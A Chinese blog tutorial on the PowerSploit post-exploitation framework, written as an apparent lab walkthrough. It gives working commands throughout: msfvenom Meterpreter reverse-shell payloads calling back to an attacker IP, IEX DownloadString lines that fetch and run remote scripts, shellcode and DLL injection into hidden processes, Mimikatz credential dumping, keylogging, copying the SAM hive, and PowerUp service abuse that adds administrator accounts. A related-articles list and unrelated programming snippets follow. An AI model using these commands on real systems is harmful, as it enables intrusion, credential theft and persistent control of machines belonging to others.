Micr067
Micr067

PowerSploit 用法

PowerSploit

PowerSploit是基于PowerShell的后渗透框架,包含很多PowerShell攻击脚本,主要用于渗透中的信息侦查,权限提升,权限维持,github地址为: https://github.com/PowerShellMafia/PowerSploit

  1. 安装
    1. 下载程序目录

git clone https://github.com/PowerShellMafia/PowerSploit

PowerSploit 用法_第1张图片

在浏览器输入 192.168.190.133:8080 即可看到PowerSploit各模块

PowerSploit 用法_第2张图片

  1. 各模块功能
    1. AntivirusBypass #发现杀毒软件的查杀特征
    2. CodeExecution #在目标主机上执行代码
    3. Exfiltration #目标主机上的信息收集工具
    4. Mayhem #蓝屏等破坏工具
    5. Persistence #后门脚本(持久性控制)
    6. Recon #以目标主机为跳板,进行内网信息侦查
    7. ScriptModification #在目标主机上创建或修改脚本

PowerSploit脚本攻击实战

Invoke-Shellcode – 常用于将ShellCode插入指定的进程ID或本地PowerShell中

 

(1). Invoke-Shellcode

1.启用后门模块exploit/multi/handler,并选择payload

windows/meterpreter/reverse_tcp

PowerSploit 用法_第3张图片

2.生成一个PowerShell脚本木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.190.133 lport=1521 -f powershell -o /root/test

PowerSploit 用法_第4张图片

3.在目标机器上下载脚本

IEX (New-Object Net.WebClient).DownloadString("http://192.168.190.133/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")

# 查找指定文件

Get-ChildItem C:\Windows\system32\ -Include "Invoke-Shellcode.ps1" -recurse

-Include:指定文件的扩展名 如果查找所有的txt,命令中输入“*.txt”

-recurse:设定查询方式

4.下载木马

IEX (New-Object Net.WebClient).DownloadString("http://192.168.190.133/test")

 

5.执行木马

Invoke-Shellcode -Shellcode ($buf) -Force

PowerSploit 用法_第5张图片

成功获得session

PowerSploit 用法_第6张图片

(2)注入进程

下载脚本以及木马

IEX (New-Object Net.WebClient).DownloadString("http://192.168.190.133/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")

IEX (New-Object Net.WebClient).DownloadString("http://192.168.190.133/test")

  1. 查看当前进程

Get-Process 或 ps

PowerSploit 用法_第7张图片

  1. 创建一个名为notepad的新进程,并设置为隐藏
  2. 要记住我们的进程号,可以看到我这里记事本的进程为3516

Start-Process C:\Windows\system32\notepad.exe -WindowStyle Hidden

PowerSploit 用法_第8张图片

  1. 使用Invoke-Shellcode脚本注入

Invoke-Shellcode -ProcessID 3516 -Shellcode($buf) -Force

反弹成功!

PowerSploit 用法_第9张图片

 

(3).dll注入

Invoke-DLLInjection – DLL注入脚本

1.首先下载脚本

IEX (New-Object Net.WebClient).DownloadString("http://192.168.190.133/PowerSploit/CodeExecution/Invoke-DllInjection.ps1")

2.生成payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.190.133 lport=1521 -f dll -o /root/test.dll

3.下载dll文件

# dll 无法通过这种方式进行下载

IEX (New-Object Net.WebClient).DownloadString("http://192.168.190.133/test.dll")

PowerSploit 用法_第10张图片

我们通过web将dll 传输到目标主机

PowerSploit 用法_第11张图片

3.注入到现有的进程中

Invoke-DllInjection -ProcessID 2312 -Dll .\test.dll

PowerSploit 用法_第12张图片

 

PowerSploit 用法_第13张图片

 

PowerSploit 用法_第14张图片

 

(4)Invoke-Portscan – 端口扫描

IEX (New-Object Net.WebClient).DownloadString("http://192.168.190.133/PowerSploit/Recon/Invoke-Portscan.ps1")

用法:

Invoke-Portscan -Hosts 192.168.190.133,192.168.190.140 -Ports "80,22,3389"

PowerSploit 用法_第15张图片

 

(5)Invoke-Mimikatz – 获取Hash

IEX (New-Object Net.WebClient).DownloadString("http://192.168.190.133/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1")

Invoke-Mimikatz -DumpCreds

PowerSploit 用法_第16张图片

 

(6)Get-Keystrokes – 记录键盘

下载ps1:

IEX (New-Object Net.WebClient).DownloadString("http://192.168.190.133/PowerSploit/Exfiltration/Get-Keystrokes.ps1")

使用方法:

Get-Keystrokes -LogPath + <保存位置>

PowerSploit 用法_第17张图片

 

PowerSploit 用法_第18张图片

 

(7):Invoke-NinjaCopy-万能复制

 

可以用来复制一些系统无法复制的文件,如SAM文件。

IEX (New-Object Net.WebClient).DownloadString("http://192.168.190.133/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1")

Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "C:\Users\Administrator\Desktop\SAM"

PowerSploit 用法_第19张图片

 

PowerUp攻击模块

是Privesc模块下的脚本,拥有众多用来寻找目标主机windows服务漏洞进行提权的使用脚本

IEX (New-Object Net.WebClient).DownloadString("http://192.168.190.133/PowerSploit/Privesc/PowerUp.ps1")

1.加载脚本

Import-Module .\PowerUp.ps1

2.常用模块

Invoke-AllChecks #自动执行PowerUp下所有的脚本来检查目标主机

命令:Invoke-AllChecks

PowerSploit 用法_第20张图片

由于输出内容较多,可以将结果导出分析

PowerSploit 用法_第21张图片

 

PowerSploit 用法_第22张图片

Find-PathDllHijack #检查当前%PATH%的哪些目录是用户可以写入的

命令:Find-PathDllHijack

PowerSploit 用法_第23张图片

Get-ApplicationHost #利用系统上的application.config文件恢复加密过的应用池和虚拟目录的密码

命令:Get-ApplicationHost

Get-Application | Format-Table –Autosize #列表显示

 

Get-RegistryAlwaysInstallElevated #检测AlwaysInstallElevated注册表是否被设置,如果被设置,意味着MSI文件是以SYSTEM权限运行的

命令:Get-RegistryAlwaysInstallElevated

Get-RegistryAutoLogon #检测windows注册表的AutoAdminLogon项有没有被设置,可查询被设置默认的用户名密码

命令:Get-RegistryAutoLogon

Get-ServiceDetail #返回某服务的信息

命令:Get-ServiceDetail –ServiceName DHCP #获取DHCP服务详细信息

PowerSploit 用法_第24张图片

Get-ServiceFilePermission #检测当前用户能够在哪些服务的目录写入相关的可执行文件(可以通过这些文件提权)

命令:Get-ServiceFilePermission

 

Test-ServiceDaclPermission #检测所有可用的服务,并尝试对这些打开的服务进行修改(若可修改,返回服务对象)

命令:Test-ServiceDaclPermission

 

Get-ServiceUnquoted #用于检查服务路径,返回包含空格但不带引号的服务路径

命令:Get-ServiceUnquoted

Get-UnattendedInstallFile #检查以下路径,查找是否存在这些文件(文件中可能包含部署凭据)

    1. C:\sysprep\sysprep.xml
    2. C:\sysprep\sysprep.inf
    3. C:\sysprep.inf
    4. C:\Windows\Panther\Unattended.xml
    5. C:\Windows\Panther\Unattend\Unattended.xml
    6. C:\Windows\Panther\Unattend.xml
    7. C:\Windows\Panther\Unatten\Unattend.xml
    8. C:\Windows\System32\Sysprep\unattend.xml
    9. C:\Windows\System32\Sysprep\Panther\unattend.xml

命令:Get-UnattendedInstallFile

PowerSploit 用法_第25张图片

Get-ModifiableRegistryAutoRun #检查开机自启动的应用程序路径和注册表键值,返回当前用户可修改的程序路径

命令:Get-ModifiableRegistryAutoRun

PowerSploit 用法_第26张图片

Get-ModifiableScheduledTaskFile #返回当前用户能够修改的计划任务程序的名称和路径

命令:Get-ModifiableScheduledTaskFile

PowerSploit 用法_第27张图片

Get-Webconfig #返回当前服务器上web.config文件中的数据库连接字符串的明文

命令:Get-Webconfig

Invoke-ServiceAbuse #修改服务来添加用户到指定组,并可以通过设置- Command参数触发添加用户的自定义命令

命令:Invoke-ServiceAbuse -ServiceName VulnSVC #添加默认账号

Invoke-ServiceAbuse -ServiceName VulnSVC -UserName “..” #指定添加的域账号

Invoke-ServiceAbuse -ServiceName VulnSVC -UserName <> -Password <> -LocalGroup “Administrator” #添加指定用户,密码到指定组

Invoke-ServiceAbuse -ServiceName VulnSVC -Command “..” #自定义执行命令

 

Restore-ServiceBinary #恢复服务的可执行文件到原始目录

命令:Restore-ServiceBinary -ServiceName VulnSVC

 

Test-ServiceDaclPermission #检查某个用户是否在服务中有自由访问控制的权限,结果返回布尔类型

命令:Test-ServiceDaclPermission -ServiceName VulnSVC

 

Write-HijackDll #输出一个自定义命令且能够自我删除的bat文件到$env:Temp\debug.bat,并输出一个能够启动这个bat文件的DLL

 

Write-UserAddMSL #生成一个安装文件,运行这个安装文件后会反弹添加用户的对话框

命令:Write-UserAddMSL

 

Write-ServiceBinary #用于预编译C#服务的可执行文件,默认创建一个管理员账号,可以通过Command自定义命令

命令:Write-ServiceBinary –ServiceName VulnSVC #添加默认账号

Write-ServiceBinary –ServiceName VulnSVC –UserName “..” #指定添加域账号

Write-ServiceBinary –ServiceName VulnSVC –UserName <> -Password <> #指定添加用户,密码到指定组

Write-ServiceBinary –ServiceName VulnSVC –Command “..” #自定义执行命令

 

Install-ServiceBinary #通过Write-ServiceBinary写一个C#的服务来添加用户,基本用法与Write-ServiceBinary相同

区别是,前者生成可执行文件,后者直接安装服务

 

 

你可能感兴趣的:(内网渗透)

  • 命令执行讲解和函数 Ryongao 网络安全命令执行
    命令执行漏洞简介命令执行漏洞产生原因应用未对用户输入做严格得检查过滤,导致用户输入得参数被当成命令来执行命令执行漏洞的危害1.继承Web服务程序的权限去执行系统命会或读写文件2.反弹shell,获得目标服务器的权限3.进一步内网渗透远程代码执行因为业务需求,在PHP中有时需要调用一些执行命令的函数·如:eval0、assert0、preg_replace0、create_function0等,如果
  • CFS三层靶机 0e1G7 渗透笔记服务器linux运维
    参考博客:CFS三层内网靶场渗透记录【详细指南】-FreeBuf网络安全行业门户CFS三层靶机搭建及其内网渗透【附靶场环境】|TeamsSixCFS三层网络环境靶场实战-PANDA墨森-博客园(cnblogs.com)CFS三层靶机实战--内网横向渗透-知乎(zhihu.com)CFS靶机实战演练-从外网杀进三层内网,横向渗透拿到Flag-阿里云开发者社区(aliyun.com)主机发现fscan
  • 渗透测试工具库总结(全网最全) Pluto-2003 笔记网络安全测试工具github
    目录Web渗透综合扫描类1.外网2.内网信息搜集类指纹扫描资产发现子域名收集目录扫描端口扫描Burp插件浏览器插件钓鱼平台漏洞利用类综合漏洞扫描工具中间件/应用/接口漏洞利用工具信息泄露利用工具数据库利用工具社工/常规字典制作/收集常用漏洞利用工具爆破利用工具反序列化利用工具内存马注入工具探活工具反连平台内网渗透类webshell管理/插件工具c2管理工具提权项目内网收集工具横向移动工具域渗透工具
  • 快看!比KaliLinux更炫酷的鹦鹉OS系统!! 知攻善防实验室 网络安全渗透测试Web渗透黑客操作系统
    注本公众号,长期推送技术文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。79篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!前言本期介绍的为parr
  • 帮管客 存在用户信息泄露-漏洞复现-附EXP 知攻善防实验室 漏洞复现信息安全网络安全
    注本公众号,长期推送技术文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。78篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!前言帮管客是一款基于移动
  • 内网渗透概述 BTY@BTY 服务器运维网络安全安全web安全
    渗透概念正向shell:攻击者连接被攻击者机器,可用于攻击者处于内网,被攻击者处于公网的情况。攻击者–>被攻击者反向shell:被攻击者主动连接攻击者,可用于攻击者处于外网,被攻击者处于内网的情况。攻击者abc.exeAndroidAndroid:msfvenom-pandroid/meterpreter/reverse_tcpLHOST=192.168.107.129LPORT=5555R>/r
  • 内网渗透命令大全 网络安全进阶 渗透测试网络安全入门渗透测试学习零基础学安全网络安全学习路线
    1.域常用操作命令:1.域常用操作命令:netgroup/domain//获得所有域用户组列表netgroupqq_group/domain//显示域中qq_group组的成员netgroupqq_group/del/domain//删除域中qq_group组netgroupqq_groupqq/del/domain//删除域内qq_group群组中的成员QQnetgroupqq_group/ad
  • 内网安全-内网穿透 真的学不了一点。。。 内网渗透安全网络安全
    目录内网渗透Nc使用详解Nc监听和探测Nc传文件termite内网穿透工具ssh代理内网穿透ssh配置socket代理MSF多级网络穿透内网渗透Nc使用详解Nc监听和探测Nc传文件termite内网穿透工具1、termite之前叫ew (可以进行正向连接,可以进行反向连接)​2、靶机监听流量转发:./ew_for_linux64-srcsocks-l1111-e2222 #将1111端口监听到的本
  • 内网渗透-内网代理穿透和内网横向移动 炫彩@之星 内网渗透安全性测试web安全安全
    内网代理穿透和内网横向移动文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记前言进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员
  • EasyCVR 视频管理平台存在用户信息泄露[附批量POC] 知攻善防实验室 安全漏洞复现网络安全渗透测试Web渗透
    关注本公众号,长期推送技术文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。78篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!简介EasyCVR智能
  • 人手必备的 逆向分析专用虚拟机! 知攻善防实验室 安全虚拟机二进制安全逆向分析pwn逆向逆向分析安全
    关注本公众号,长期推送技术文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。76篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!前言直接看一眼效果这个
  • 内网渗透靶场01-利用域账号实现权限扩散 老男孩Nine 3.0红队特训营web安全网络安全
    本次网络拓扑图,如下所示:环境配置:配置信息:攻击机:Windows10192.168.111.128目标机器web服务器Windows7:双网卡机器192.168.111.130(模拟外网地址)192.168.52.129内网机器1:Windowsserver2008R2:192.168.52.138内网机器2:Windows2003Metasploitable192.168.52.141利用扫
  • 推荐三款内网渗透神器! 老男孩Nine 3.0红队特训营java
    ****************免责声明:任何工具等分享仅以学习为目的************************分享三款内网十分好用的渗透神器1.fscan项目地址:https://github.com/shadow1ng/fscan/releases/tag/1.7.1工具使用细节:fscan详细命令说明:fscan-h0.0.0.0/8(全网段扫描)fscan-h192.168.1.1/
  • 内网渗透靶场02----Weblogic反序列化+域渗透 老男孩Nine 3.0红队特训营服务器运维
    网络拓扑:攻击机:Kali:192.168.111.129Win10:192.168.111.128靶场基本配置:web服务器双网卡机器:192.168.111.80(模拟外网)10.10.10.80(模拟内网)域成员机器WIN7PC192.168.111.20110.10.10.201域控DC:10.10.10.10利用kscan工具,针对192.168.111.0/24C段开展端口扫描,发现2
  • 隧道穿透:端口转发、socket隧道代理 未知百分百 ATT&CK安全网络安全web安全安全代理模式webwindows内网穿透
    目录端口转发lcx工具Lcx工具正向连接Lcx工具反向连接SOCKET隧道代理socks常见利用场景ProxifierSocksCap64Proxychains端口转发本篇会和搭建介绍一下端口转发和socket隧道代理的概念和简单演示lcx工具lcx工具是一个红队人员在内网渗透测试中最典型的端口转发工具,lcx工具可分为Windows和Linux两个版本,这里以lcx工具为例,以转发3389端口为
  • 隧道穿透:内网探测协议出网 未知百分百 安全ATT&CK网络安全网络安全windowshttpdnnicmp
    目录1、TCP/UDP使用nc探测使用Telnet探测使用UDP探测2、HTTP/HTTPSWindows(1)Bitsadmin(2)CertuilLinux(1)Curl(2)Wget3、ICMPWindows(1)Ping(2)TracertLinux4、DNSWindowsLinux(1)Dig(2)Nslookup当我们在进行内网渗透的时候,经常会遇到目标主不出网的问题,因此在获取目标主
  • IMF_1(VulbHub)_WriteUp 沫风港 综合渗透_靶场通关文档网络安全
    目录1、主机探测2、web渗透发现flag1发现flag2拼接imfadministrator目录收集用户名代码审计之弱类型绕过发现flag3进入IMFCMS漏扫测试尝试跑sqlmap发现异常数据发现flag4继续访问uploadr942.php页面waf绕过(.htaccess绕过)发现flag5反弹shell3、内网渗透查找agent查看开启的端口情况查看/usr/local/bin下的文件敲
  • CewlKid(VulnHub)_Writeup 沫风港 综合渗透_靶场通关文档网络安全
    CewlKid(VulnHub)文章目录CewlKid(VulnHub)1、前期信息收集nmap扫描①存活主机②端口扫描、操作系统③漏洞探测④tcp、udp扫描gobuster目录爆破dirb目录爆破2、Web渗透部分思路一:SitemagicCMS漏洞库查询思路二:常规web渗透手法①信息收集②密码爆破,尝试进后台③上传webshell④拿下普通权限终端3、内网渗透部分检查ip发现拿到的shel
  • 国庆福利双击 之 实验室攒了2年的资源大兜底 Ms08067安全实验室 编程语言人工智能web开发移动开发github
    从中秋节开始,就不断有读者催问,这次国庆会有什么活动:考虑到有些读者对MS08067旗下6个知识星球不是很了解,老规矩,还是先来简单介绍一下。【内网安全攻防】2019年11月,基于国内第一本也是唯一一本内网安全方面专著《内网安全攻防:渗透测试实战指南》为教案,录制配套视频讲解,第一期课程于2020年10月30日全部结束,共计75课时。2021年新增内网渗透第二期高级课程【内网安全攻防2.0】,目前
  • 渗透测试-JavaScript 利器整理 知攻善防实验室 javascript开发语言ecmascript
    关注本公众号,长期推送技术文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。73篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!渗透测试-JavaSc
  • 爆改自用免杀2.0-绕过主流杀软机制 知攻善防实验室 安全免杀Shellcode渗透测试网络安全免杀
    关注本公众号,长期推送漏洞文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。74篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!文章开头,上次写的免杀
  • SRC挖洞骚思路整理 知攻善防实验室 安全web安全网络安全威胁分析网络安全
    关注本公众号,长期推送漏洞文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。73篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!/SRC漏洞挖掘思路/
  • EasyCVR 视频管理平台存在用户信息泄露[附批量POC] 知攻善防实验室 安全
    关注本公众号,长期推送技术文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。73篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!简介EasyCVR智能
  • 记一次“微信交流群“内免杀木马分析以及溯源 知攻善防实验室 web安全安全威胁分析网络安全安全架构安全
    关注本公众号,长期推送技术文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。73篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!反编译得到源码拿到文件
  • 【42万字,2902页】全网最全《零基础网络安全/黑客自学笔记》,爆肝分享! 网安员阿道夫 web安全安全网络安全
    这次为大家带来一份零基础也能学会的《全网最全黑客自学笔记》,“全网最全”可不是吹牛的,整个笔记一共42万字,2902页,95个章节。这份笔记涵盖了网络安全导论、渗透测试基础、网络基础、Linux操作系统基础、web安全等等入门知识点;也有密码爆破、漏洞挖掘、SQL注入等进阶技术;还有反序列化漏洞、RCE、内网渗透、流量分析等高阶提升内容;最后还总结了一套护网蓝队攻略。部分内容展示:因为所包含的内容
  • cobalt strike使用跳板进行内网渗透 风炫安全
    0x01什么是PivotingPivoting,在本手册中,指的是「将一个受害机器转为其他攻击和工具的跳板」。CobaltStrike的Beacon提供了多种pivoting选项。前提是Beacon处于交互模式。交互模式意味着一个Beacon每秒内多次连接到团队服务器。使用sleep0命令来使你的Beacon进入交互模式。0x02开启SOCKS代理通过[beacon]→Pivoting→SOCKS
  • 内网安全(四)---横向渗透:PTH&PTK&PTT 暮w光 内网安全安全web安全
    域横向PTH&PTK&PTT哈希票据传递1.知识:PTH(passthehash):利用lm或ntlm的值。PTT(passtheticket):利用的票据凭证TGT。PTK(passthekey):利用的ekeys、aes256。1)PTH:PTH在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LMHash和NTLMHash访问远程主机或服务,而不用提供明文密码。如果禁用了ntlm
  • 内网渗透-PTH&PTT&PTK 高小白—专业摸鱼 内网渗透web安全网络安全
    内网渗透-PTH&PTT&PTK!–看小迪老师课程自己做的笔记!–之前gitee图床出问题了,部分图片实在找不到了,想深入研究可以去看小迪老师课程一、kerberos协议具体工作方法1、客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为秘钥),发送给kdc(域控),kdc对用户进行检测,成功之后创建TGT2、将TGT进行加密签名返回给客户机,只有域用户(krb
  • 【远控使用】Cobalt Strike横向渗透域控 孤桜懶契
    categories:知识积累top:FALSEcopyright:trueabbrlink:1643719980date:'2021-8-712:00:00'description:1400x780tags:内网渗透提权渗透测试黑客工具photos:https://gitee.com/gylq/cloudimages/raw/master/img/image-20210826182104275.
  • 红日靶场1 Hello_Brian 内网横向运维
    记一次内网渗透红日靶场下载地址:漏洞详情靶场地址分配:模拟外网网段:192.168.174.0/24模拟内网网段:192.168.52.0/24攻击机:kali:192.168.174.131靶机:域控服务器2008:192.168.52.138(内网)域成员2003:192.168.52.141(内网)Win7:192.168.52.143(内网)192.168.174.130(外网)1.信息收
  • java线程Thread和Runnable区别和联系 zx_code javajvmthread多线程Runnable
    我们都晓得java实现线程2种方式,一个是继承Thread,另一个是实现Runnable。 模拟窗口买票,第一例子继承thread,代码如下 package thread; public class ThreadTest { public static void main(String[] args) { Thread1 t1 = new Thread1(
  • 【转】JSON与XML的区别比较 丁_新 jsonxml
    1.定义介绍 (1).XML定义 扩展标记语言 (Extensible Markup Language, XML) ,用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 XML使用DTD(document type definition)文档类型定义来组织数据;格式统一,跨平台和语言,早已成为业界公认的标准。 XML是标
  • c++ 实现五种基础的排序算法 CrazyMizzz C++c算法
    #include<iostream> using namespace std; //辅助函数,交换两数之值 template<class T> void mySwap(T &x, T &y){ T temp = x; x = y; y = temp; } const int size = 10; //一、用直接插入排
  • 我的软件 麦田的设计者 我的软件音乐类娱乐放松
         这是我写的一款app软件,耗时三个月,是一个根据央视节目开门大吉改变的,提供音调,猜歌曲名。1、手机拥有者在android手机市场下载本APP,同意权限,安装到手机上。2、游客初次进入时会有引导页面提醒用户注册。(同时软件自动播放背景音乐)。3、用户登录到主页后,会有五个模块。a、点击不胫而走,用户得到开门大吉首页部分新闻,点击进入有新闻详情。b、
  • linux awk命令详解 被触发 linux awk
    awk是行处理器: 相比较屏幕处理的优点,在处理庞大文件时不会出现内存溢出或是处理缓慢的问题,通常用来格式化文本信息 awk处理过程: 依次对每一行进行处理,然后输出 awk命令形式: awk [-F|-f|-v] ‘BEGIN{} //{command1; command2} END{}’ file [-F|-f|-v]大参数,-F指定分隔符,-f调用脚本,-v定义变量 var=val
  • 各种语言比较 _wy_ 编程语言
                        Java Ruby PHP 擅长领域                  
  • oracle 中数据类型为clob的编辑 知了ing oracle clob
    public void updateKpiStatus(String kpiStatus,String taskId){ Connection dbc=null; Statement stmt=null; PreparedStatement ps=null; try { dbc = new DBConn().getNewConnection(); //stmt = db
  • 分布式服务框架 Zookeeper -- 管理分布式环境中的数据 矮蛋蛋 zookeeper
    原文地址: http://www.ibm.com/developerworks/cn/opensource/os-cn-zookeeper/ 安装和配置详解 本文介绍的 Zookeeper 是以 3.2.2 这个稳定版本为基础,最新的版本可以通过官网 http://hadoop.apache.org/zookeeper/来获取,Zookeeper 的安装非常简单,下面将从单机模式和集群模式两
  • tomcat数据源 alafqq tomcat
    数据库 JNDI(Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API。 没有使用JNDI时我用要这样连接数据库: 03.  Class.forName("com.mysql.jdbc.Driver");  04.  conn
  • 遍历的方法 百合不是茶 遍历
                                                          遍历 在java的泛
  • linux查看硬件信息的命令 bijian1013 linux
    linux查看硬件信息的命令 一.查看CPU: cat /proc/cpuinfo   二.查看内存: free   三.查看硬盘: df   linux下查看硬件信息 1、lspci 列出所有PCI 设备; lspci - list all PCI devices:列出机器中的PCI设备(声卡、显卡、Modem、网卡、USB、主板集成设备也能
  • java常见的ClassNotFoundException bijian1013 java
    1.java.lang.ClassNotFoundException: org.apache.commons.logging.LogFactory   添加包common-logging.jar2.java.lang.ClassNotFoundException: javax.transaction.Synchronization    
  • 【Gson五】日期对象的序列化和反序列化 bit1129 反序列化
    对日期类型的数据进行序列化和反序列化时,需要考虑如下问题:   1. 序列化时,Date对象序列化的字符串日期格式如何 2. 反序列化时,把日期字符串序列化为Date对象,也需要考虑日期格式问题 3. Date A -> str -> Date B,A和B对象是否equals   默认序列化和反序列化     import com
  • 【Spark八十六】Spark Streaming之DStream vs. InputDStream bit1129 Stream
      1. DStream的类说明文档:   /** * A Discretized Stream (DStream), the basic abstraction in Spark Streaming, is a continuous * sequence of RDDs (of the same type) representing a continuous st
  • 通过nginx获取header信息 ronin47 nginx header
    1. 提取整个的Cookies内容到一个变量,然后可以在需要时引用,比如记录到日志里面, if ( $http_cookie ~* "(.*)$") {         set $all_cookie $1; }     变量$all_cookie就获得了cookie的值,可以用于运算了
  • java-65.输入数字n,按顺序输出从1最大的n位10进制数。比如输入3,则输出1、2、3一直到最大的3位数即999 bylijinnan java
    参考了网上的http://blog.csdn.net/peasking_dd/article/details/6342984 写了个java版的: public class Print_1_To_NDigit { /** * Q65.输入数字n,按顺序输出从1最大的n位10进制数。比如输入3,则输出1、2、3一直到最大的3位数即999 * 1.使用字符串
  • Netty源码学习-ReplayingDecoder bylijinnan javanetty
    ReplayingDecoder是FrameDecoder的子类,不熟悉FrameDecoder的,可以先看看 http://bylijinnan.iteye.com/blog/1982618 API说,ReplayingDecoder简化了操作,比如: FrameDecoder在decode时,需要判断数据是否接收完全: public class IntegerH
  • js特殊字符过滤 cngolon js特殊字符js特殊字符过滤
    1.js中用正则表达式 过滤特殊字符, 校验所有输入域是否含有特殊符号function stripscript(s) {    var pattern = new RegExp("[`~!@#$^&*()=|{}':;',\\[\\].<>/?~!@#¥……&*()&mdash;—|{}【】‘;:”“'。,、?]"
  • hibernate使用sql查询 ctrain Hibernate
    import java.util.Iterator; import java.util.List; import java.util.Map; import org.hibernate.Hibernate; import org.hibernate.SQLQuery; import org.hibernate.Session; import org.hibernate.Transa
  • linux shell脚本中切换用户执行命令方法 daizj linuxshell命令切换用户
    经常在写shell脚本时,会碰到要以另外一个用户来执行相关命令,其方法简单记下:   1、执行单个命令:su - user -c "command" 如:下面命令是以test用户在/data目录下创建test123目录 [root@slave19 /data]# su - test -c "mkdir /data/test123" 
  • 好的代码里只要一个 return 语句 dcj3sjt126com return
    别再这样写了:public boolean foo() {    if (true) {         return true;     } else {          return false;    
  • Android动画效果学习 dcj3sjt126com android
    1、透明动画效果 方法一:代码实现 public View onCreateView(LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState) { View rootView = inflater.inflate(R.layout.fragment_main, container, fals
  • linux复习笔记之bash shell (4)管道命令 eksliang linux管道命令汇总linux管道命令linux常用管道命令
    转载请出自出处: http://eksliang.iteye.com/blog/2105461     bash命令执行的完毕以后,通常这个命令都会有返回结果,怎么对这个返回的结果做一些操作呢?那就得用管道命令‘|’。     上面那段话,简单说了下管道命令的作用,那什么事管道命令呢?     答:非常的经典的一句话,记住了,何为管
  • Android系统中自定义按键的短按、双击、长按事件 gqdy365 android
    在项目中碰到这样的问题: 由于系统中的按键在底层做了重新定义或者新增了按键,此时需要在APP层对按键事件(keyevent)做分解处理,模拟Android系统做法,把keyevent分解成: 1、单击事件:就是普通key的单击; 2、双击事件:500ms内同一按键单击两次; 3、长按事件:同一按键长按超过1000ms(系统中长按事件为500ms); 4、组合按键:两个以上按键同时按住;
  • asp.net获取站点根目录下子目录的名称 hvt .netC#asp.nethovertreeWeb Forms
    使用Visual Studio建立一个.aspx文件(Web Forms),例如hovertree.aspx,在页面上加入一个ListBox代码如下: <asp:ListBox runat="server" ID="lbKeleyiFolder" />   那么在页面上显示根目录子文件夹的代码如下: string[] m_sub
  • Eclipse程序员要掌握的常用快捷键 justjavac javaeclipse快捷键ide
